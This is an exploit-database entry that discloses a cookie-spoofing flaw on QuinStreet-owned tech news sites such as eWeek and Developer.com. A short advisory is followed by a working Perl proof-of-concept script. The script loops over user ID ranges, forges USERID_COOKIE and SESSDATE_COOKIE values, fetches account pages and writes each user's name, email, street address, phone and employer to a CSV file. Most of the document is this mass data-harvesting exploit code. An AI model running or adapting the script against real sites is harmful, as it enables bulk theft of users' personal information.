QuinStreet Database ID Spoofing



EKU-ID: 3086 CVE: OSVDB-ID:
Author: Henry Garrison Published: 2013-03-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# March 13, 2013
# FULL-DISCLOSURE Exclusive - Vielen Dank John!
#
# VULNERABILITY SUMMARY
# ---------------------
# A confirmed security vulnerability has been identified with 30 high traffic web
# sites owned by QuinStreet.   Vendor stores database IDs in cookies which are
# easily spoofed (USERID_COOKIE), allowing all user information to be accessed.  
# Seven million users are reportedly in the database:
# http://www.itbusinessedge.com/about-itbe
#
# Web sites
 include:
#
# Ziff Davis
# ----------
# http://www.eweek.com/
# http://www.baselinemag.com/
# http://www.cioinsight.com/
# http://www.channelinsider.com/
# http://www.eseminarslive.com/
#
# Developer.com Network
# ---------------------
# http://www.developer.com/
# http://www.devx.com/
# http://www.codeguru.com/
# http://www.htmlgoodies.com/
#
# IT Business Edge Network
# ------------------------
# http://www.itbusinessedge.com/
# http://www.datamation.com/
# http://www.smallbusinesscomputing.com/
# http://www.internetnews.com/
# http://www.serverwatch.com/
# http://www.infostor.com/
# http://www.enterprisestorageforum.com/
# http://www.enterprisenetworkingplanet.com/
# http://www.enterpriseappstoday.com/
# http://www.cioupdate.com/
# http://www.databasejournal.com/
# http://www.esecurityplanet.com/
# http://www.webopedia.com/
# http://www.linuxtoday.com/
#
# PROOF OF CONCEPT
# ----------------
# The below sample POC Perl script will extract user demographic data from the 
# above listed web
 sites and write the contents to a csv file.
#  
# On Windows, use http://www.strawberryperl.com/, for other O/S visit www.perl.org/get.html
#
 
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
 
# assetforms.* are iframes inserted into each website user management page
my @urls  = ("http://assetform.itbusinessedge.com/acl/accountController.jsp",
             "http://assetform.eweek.com/acl/accountController.jsp?css=eweek/"
    ."eweekArticleRegistrationForm.css&sdn=Eweek&w=http://www.eweek.com"
   
 ."&u=%2Findex.php%2FaccountManagement%3F&isIframed=yes&rand=11207&formType=",
             "http://assetform.developer.com/acl/accountController.jsp?formType="
    ."userProfile&css=developerCom/developerComArticleRegistrationForm.css&w="
    ."http://www.developer.com&sdn=developer&nlalkeys=null&submit=submit/");
 
my $agent = "User-Agent=Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; "
            ."Trident/6.0)";

#comma delimited file name
my $outfile = "eweek-users" .int(rand 100000) . ".csv";

my $cookie_jar = HTTP::Cookies->new;
my $mech = WWW::Mechanize->new(cookie_jar=>$cookie_jar);
$mech->agent($agent);
my $url;
my $Website;
my $LowUserid_Cookie = 0;
my $HighUserid_Cookie = 0;
my $i;
my $SessDate;
my $UserDemographic;
my $output_page;
 
RandUserRange();
CreateCsvHeader();
 
for ($i = $LowUserid_Cookie; $i < $HighUserid_Cookie; $i+=100) {
 $SessDate = "136303" . int(1000000 + rand 1000000);
 setCookies($i,$SessDate);
 
 foreach $url (@urls){
  $Website = substr($url, 17, 5);
  retrieveUrl($url);
  #print "\n\nCookies:\n", $mech->cookie_jar->as_string, "\n";
  print ("UserID:" . $i . "\n");
  print ("Website" . $Website . "\n");
  print ("Length of output_page:" . length($output_page));
  print ("\n\n");
  last if
 length($output_page);
   }
 
 if (length($output_page)) {
    open(OUTFILE,">>$outfile");
    $UserDemographic = processForm($i);
    print OUTFILE $UserDemographic;
    #print OUTFILE $output_page;
    close (OUTFILE);
 }
 }
exit;
 
sub RandUserRange {
 # if (rand(2) < 1) {
   #$LowUserid_Cookie = int(rand( 1000)) + 390000;
   #$LowUserid_Cookie .= "21";
   
   $LowUserid_Cookie = "38500021";
   $HighUserid_Cookie ="47000021";
   
   #   }
   #  else {
   #$LowUserid_Cookie = int(rand(10000)) + 1500000;
   #  $LowUserid_Cookie =  "144530710";
   #  $HighUserid_Cookie =
 "180000000";
# }
}
 
sub setCookies {
 $cookie_jar->clear;
 $cookie_jar->set_cookie('0','USERID_COOKIE',$_[0],'/','.itbusinessedge.com',0); 
 $cookie_jar->set_cookie('0','SESSDATE_COOKIE',$_[1],'/','.itbusinessedge.com',0); 
 $cookie_jar->set_cookie('0','USERID_COOKIE',$_[0],'/','.eweek.com',0); 
 $cookie_jar->set_cookie('0','SESSDATE_COOKIE',$_[1],'/','.eweek.com',0); 
 $cookie_jar->set_cookie('0','USERID_COOKIE',$_[0],'/','.developer.com',0); 
 $cookie_jar->set_cookie('0','SESSDATE_COOKIE',$_[1],'/','.developer.com',0); 
}
 
sub retrieveUrl {
  $mech->get($_[0]);
  $output_page = $mech->content();
  
  if ($output_page =~ m/Sign In/)  {
   $output_page = "";
  }  
   return ($output_page); 
}
  
sub
 processForm {
  $mech->form_name("formTypePost");
  my $Userid = $_[0];
  my $FirstName = clean($mech->value('FN'));
  my $LastName = clean($mech->value('LN'));
  my $Email = clean($mech->value('EM'));
  my $CompanyName = clean($mech->value('CompanyName'));
  my $Title = clean($mech->value('Designation'));
  my $JobFunction = clean($mech->value('JobFunction'));
  my $DecisionRole = clean($mech->value('DecisionRole'));
  my $Employees = clean($mech->value('NumberofEmployeesRange'));
  my $Industry = clean($mech->value('Industry'));
  my $StreetAddress = clean($mech->value('S1'));
  my $City = clean($mech->value('CT'));
  my $State = clean($mech->value('SP'));
  my $PostalZone = clean($mech->value('PC'));
  my $Country = clean($mech->value('CN'));
  my $Phone =
 clean($mech->value('WP'));
  my $s;
  $s = $Userid .','. $Website .',' .$FirstName .','. $LastName .','. $Email .',' 
    .$CompanyName .','. $Title .','. $JobFunction .','. $DecisionRole .',' 
    .$Employees .','. $Industry .','. $StreetAddress .','. $City .','. $State
    .','. $PostalZone .','. $Country .','. $Phone . "\n";
  return ($s);
}
 
sub clean {
  local($a) = ($_[0]);
  $a =~ s/[^a-zA-Z0-9 \.\@!_%+-]//g;
  return $a
}
 
sub CreateCsvHeader { 
  open(OUTFILE,">$outfile") || die("File write error"); 
  print OUTFILE "UserId,Website,FirstName,LastName,Email,CompanyName,Title,"
  ."JobFunction,DecisionRole,Employees,Industry,StreetAddress,City,State,"
  ."PostalCode,Country,Phone\n";   
  close(OUTFILE);
}